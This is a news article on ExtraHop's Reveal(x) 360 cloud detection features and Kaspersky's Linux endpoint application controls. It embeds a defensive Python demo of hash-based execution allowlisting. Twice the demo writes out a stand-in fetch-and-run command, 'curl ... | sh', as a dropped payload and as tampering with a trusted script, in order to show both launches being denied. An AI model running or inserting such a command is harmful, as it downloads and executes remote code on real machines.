Two product announcements on Tuesday — one from ExtraHop, the other from Kaspersky — indicate industry vendors are looking to add new features to their products so they function more effectively in hybrid cloud environments.
The new Reveal(x) 360 Threat Briefings from ExtraHop offer incident response reports so security teams can retroactively investigate critical CVEs and exploits. ExtraHop also introduced Reveal(x) 360 Ultra Sensors for Amazon Web Services (AWS) workloads, which promise SaaS-based detection, response, and forensic investigation capabilities.
Forensic data will also be made available to AWS customers via ExtraHop Packet Basics, a free packet capture product on the AWS Marketplace. According to a recent report from ESG Research, incident response teams need better threat detection and response efficacy, especially against advanced persistent threats that move laterally across hybrid networks over extended periods of time.
Frank Dickson, program vice president for security and trust at IDC, said ExtraHop has a long history of collecting and analyzing network data at line speed. The company's Reveal(x) performs out-of-band analysis on a copy of network traffic received via port mirroring (SPAN) or a test access point (TAP) aggregator, so the sensor never sits in the forwarding path; it observes and detects, but does not itself block traffic.
“Elevating detection and response capabilities to IaaS facilitates investigations and delivers much-needed tools to address the hybrid cloud use cases,” Dickson said. “Our software, systems and data are in the cloud. Our detection and response capabilities thus also have to address cloud.”
On the Kaspersky front, the vendor's recent research argues that organizations need dedicated protection for Linux servers, whether on-premises or in the cloud. Advanced threats against Linux are as severe as those against other operating systems; such servers often host critical applications or serve as a springboard for access to endpoints on Windows machines and iOS devices.
To counter such threats, the updated Kaspersky Endpoint Security for Linux adds application controls for Linux workloads, intended to prevent the launch of unauthorized or unknown, and potentially dangerous, executables.
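The application-control idea above is, at its core, deny-by-default execution control against an allowlist of approved executables. The following is an added illustration of that principle, not Kaspersky's code or a description of how its product implements the feature: it keys the allowlist on the SHA-256 of the file contents rather than on the path, so a trusted binary that has been replaced or appended to is denied as well, and it includes an audit-only mode of the kind typically used to tune an allowlist before enforcement. The script paths, contents and allowlist are constructed for the demo.

```python
import hashlib
import os
import tempfile
from dataclasses import dataclass


def sha256_of_file(path: str) -> str:
    """Hash file contents in chunks so large binaries need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


@dataclass(frozen=True)
class Decision:
    allowed: bool   # True only when the launch would be permitted
    reason: str     # human-readable verdict for the audit log


def check_launch(path: str, allowlist: set[str], enforce: bool = True) -> Decision:
    """Deny-by-default execution control keyed on content digest, not path.

    In enforce mode an unknown or modified executable is denied. With
    enforce=False (audit mode) the same verdict is computed but the launch is
    permitted, which is how an allowlist is usually tuned before enforcing it.
    """
    if not os.path.isfile(path):
        return Decision(False, f"DENY {path}: not a regular file")
    digest = sha256_of_file(path)
    if digest in allowlist:
        return Decision(True, f"ALLOW {path}: digest {digest[:12]} is allowlisted")
    verdict = f"{path}: digest {digest[:12]} not in allowlist"
    if enforce:
        return Decision(False, "DENY " + verdict)
    return Decision(True, "AUDIT-ONLY would deny " + verdict)


def demo() -> dict[str, Decision]:
    """Constructed scenario: one approved script, one unknown script, and then
    the approved script tampered with in place at its trusted path."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        backup = os.path.join(tmp, "backup.sh")   # hypothetical approved job
        unknown = os.path.join(tmp, "miner.sh")   # hypothetical dropped payload
        with open(backup, "w") as f:
            f.write("#!/bin/sh\ntar czf /backup/www.tgz /var/www\n")
        with open(unknown, "w") as f:
            f.write("#!/bin/sh\ncurl -s http://example.invalid/x | sh\n")

        # Allowlist captured from the known-good image at deploy time.
        allowlist = {sha256_of_file(backup)}

        results["approved"] = check_launch(backup, allowlist)
        results["unknown_enforce"] = check_launch(unknown, allowlist)
        results["unknown_audit"] = check_launch(unknown, allowlist, enforce=False)

        # Attacker appends a payload to the trusted script: same path, new digest.
        with open(backup, "a") as f:
            f.write("curl -s http://example.invalid/x | sh\n")
        results["tampered"] = check_launch(backup, allowlist)
    return results


if __name__ == "__main__":
    for name, d in demo().items():
        print(f"{name:16} allowed={d.allowed}  {d.reason}")
```

A real agent would hook execution (for example via a kernel module, fanotify or an LSM) rather than be called by hand, and would need to cover interpreters and scripts, not just ELF binaries, since `sh script.sh` launches an allowlisted interpreter on unknown content; the digest check shown here is the policy decision such a hook would make.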
Kaspersky Endpoint Security for Linux also aims to support DevOps by scanning containers and images in more containerization environments: in addition to Docker, it now supports CRI-O, Podman and runc.
Protecting Linux has become a hot-button issue of late as cybercriminals turn their attention to softer, non-Windows targets, IDC's Dickson added.
“Linux is not only important for cloud instances but many on-premises servers are Linux-based,” Dickson said. “Kaspersky’s new offering allows them to address two needs: hardening defenses for valuable and vulnerable on-premises servers and also extending protection to container-based Docker.”